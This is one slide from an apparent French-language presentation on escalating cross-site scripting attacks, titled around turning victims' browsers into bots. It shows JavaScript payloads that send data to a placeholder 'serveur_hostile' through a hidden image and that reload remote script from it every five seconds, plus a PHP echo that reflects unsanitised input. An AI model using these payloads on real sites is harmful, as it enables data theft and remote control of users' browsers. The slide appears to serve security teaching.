X hits on this document

88 views

0 shares

0 downloads

0 comments

21 / 46

XSS – de la brise à l'ouragan – II) Chute violente du baromètre - les catalyseurs c) ça me « bot » !!

Site vulnérable - Domaine A

Serveur pirate

Chargement d'images :

echo "b(\"".$valeur."\");";

document.write("<img id=j name=j width=0 height=0 border=0 src=http://serveur_hostile/image.php ?parametre=envoi_de_donnees >");

Fonction de retour :

Envoi d'informations Demandes d'instructions

Envoi d'instructions Demandes d'informations

function b(u){ var Ndiv = null; var jsFile2 = document.getElementById('home_main'); if (Ndiv) {jsFile2.removeChild(Ndiv);} Ndiv = document.createElement("div" ); Ndiv.innerHTML=u; jsFile2.appendChild(Ndiv); }

Boucle javascript côté client :

Zone intranet

document.write("<SPAN id='myScript'><script>var script- Node = null;function me(){var jsFile = document.getEle- mentById('myScript');if (scriptNode) {jsFile.removeChild(scriptNode);}scriptNode=document.cre ateElement('script');scriptNode.type='text/javascript';s criptNode.src = 'http://serveur_hostile/generateur_de_script.php';jsFile .appendChild(scriptNode);}window.setInterval('me();', 5000);</SCRIPT></SPAN>");

Document info
Document views88
Page views97
Page last viewedSat Dec 03 18:15:55 UTC 2016
Pages46
Paragraphs417
Words3787

Comments